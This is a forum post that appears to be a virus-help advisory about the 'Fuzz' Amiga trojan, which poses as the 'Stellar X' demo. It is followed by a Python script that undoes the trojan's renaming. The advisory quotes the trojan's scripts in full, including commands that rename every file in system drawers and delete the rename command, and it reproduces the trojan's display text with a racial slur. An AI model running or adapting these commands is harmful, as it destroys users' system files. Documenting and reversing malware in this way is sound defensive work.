Jan Andersen Admin
Posts : 29 Join date : 2020-04-04 Location : Copenhagen, Denmark
Subject: Fuzz Trojan (stellarx.lha)
Posted: Sat Apr 11, 2020 5:46 am
Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE
Hi All.... 11 april 2020
We have just received this archive. It is said to be a demo for ECS & AGA machines. But if you run this demo, the files on your Amiga system in C:, S:, Devs:, L:, Libs: will be renamed. We are not really sure how old this trojan is, but at this time there is NO ANTIVIRUS program that can find it. So watch out for it. Here is some info about the trojan:
------------------------------------------------------
Trojan name: Fuzz
Trojan file: Many files do damage
Trojan size: Many files
Trojan archive: Stellarx.lha
Archive size: 444.898 bytes
Archive info: 'Stellar X' Demo - ECS & AGA Machines
------------------------------------------------------
There is a ReadMe.txt in the archive, with an ad from a Canadian BBS called 'Peace Courier Canadian HQ', saying use a 14.4 USR Dual modem. So we guess it must be an old trojan, there ain't many BBS'es left.
The trojan bomb is named 'Stellar X Demo'. When you start the Demo, it looks like this:
    Yo! Fuk-Dat-Boyee... UpTheAss
    Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
    navel creditz
The FuZZ trojan archive contains many other files:
- BooYaKa (Script-File)
- BooYaka.info (Icon)
- DATA/Boyee (Rename Command)
- DATA/Yo! (Run Command)
- DATA/Fuk-Dat-Boyee... (CLI Show-Command Picture)
- DATA/navel (Execute Command)
- DATA/Fuk-Diz-Boyee... (Noiseplayer Music Player)
- DATA/Wigger! (Soundmodule)
- DATA/fuzzy (List Command)
- DATA/creditz (ScriptFile)
- DATA/Dude (Dir Command)
- DATA/BooYaKa (Script File)
- DATA/UpTheAss (Picture)
If you start the trojan, it executes the script file 'BooYaKa', where you can read this:
    cd data
    execute booyaka
This means that the trojan will execute the file 'DATA/BooYaKa'. This file contains:
    Yo! Fuk-Dat-Boyee... UpTheAss
    Yo! Fuk-Diz-Boyee... >nil: -m6 Wigger!
    navel creditz
Now the trojan displays the picture 'UpTheAss', then plays the module 'Wigger!', and executes the script file 'creditz':
    fuzzy >rank s: lformat "boyee %s%s s:%s.FuZZ"
    navel rank
    fuzzy >rank devs: lformat "boyee %s%s devs:%s.FuZZ"
    navel rank
    fuzzy >rank libs: lformat "boyee %s%s libs:%s.FuZZ"
    navel rank
    fuzzy >rank l: lformat "boyee %s%s l:%s.FuZZ"
    navel rank
    fuzzy >rank fonts: lformat "boyee %s%s fonts:%s.FuZZ"
    navel rank
    fuzzy >rank c: lformat "boyee %s%s c:%s.FuZZ"
    navel rank
    delete c:rename
Now the trojan will rename every file in S:, C:, Fonts:, Libs:, L: and Devs:, and delete the command c:rename.
Fuzz Trojan is unknown to all Anti-Virus programs. TAKE CARE
Regards....
Jan Andersen
Virus Help Denmark
www.vht-dk.dk
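A recovery sketch for the renaming described in the post above, added here as an example and not part of the original post or of any Virus Help Denmark tool. It assumes the affected Amiga drawer (S:, C:, Devs: and so on) is reachable as a directory from a host with Python, for example through an emulator's shared folder; the function names and the sample file names are constructed. It strips the '.FuZZ' suffix from top-level entries and never overwrites an existing file.

```python
import os
import tempfile

SUFFIX = ".FuZZ"  # suffix appended by the 'creditz' script quoted in the post


def plan_restore(directory):
    """Return (renames, conflicts) for top-level entries ending in SUFFIX."""
    # Amiga filesystems are case-insensitive, so compare lowercased names.
    existing = {n.lower() for n in os.listdir(directory)}
    renames, conflicts = [], []
    for name in sorted(os.listdir(directory)):
        if not name.lower().endswith(SUFFIX.lower()) or len(name) == len(SUFFIX):
            continue
        original = name[:-len(SUFFIX)]
        if original.lower() in existing:
            # A file with the original name is already there (for example
            # restored by hand): report it instead of overwriting it.
            conflicts.append((name, original))
        else:
            renames.append((name, original))
            existing.add(original.lower())
    return renames, conflicts


def restore(directory, dry_run=True):
    """Undo the renaming in one drawer; with dry_run=True only report the plan."""
    renames, conflicts = plan_restore(directory)
    if not dry_run:
        for old, new in renames:
            os.rename(os.path.join(directory, old), os.path.join(directory, new))
    return renames, conflicts


def demo():
    """Constructed sample: a stand-in for an S: drawer after the trojan has run."""
    with tempfile.TemporaryDirectory() as s_dir:
        for name in ("Startup-Sequence.FuZZ", "User-Startup.FuZZ",
                     "Shell-Startup.FuZZ", "Shell-Startup", "notes.txt"):
            open(os.path.join(s_dir, name), "w").close()
        renames, conflicts = restore(s_dir, dry_run=False)
        return renames, conflicts, sorted(os.listdir(s_dir))


if __name__ == "__main__":
    print(demo())
```

Run `restore()` once per affected drawer with `dry_run=True` first and review the conflicts list. The post reports that c:rename is deleted, so that command has to come back from original media or a backup.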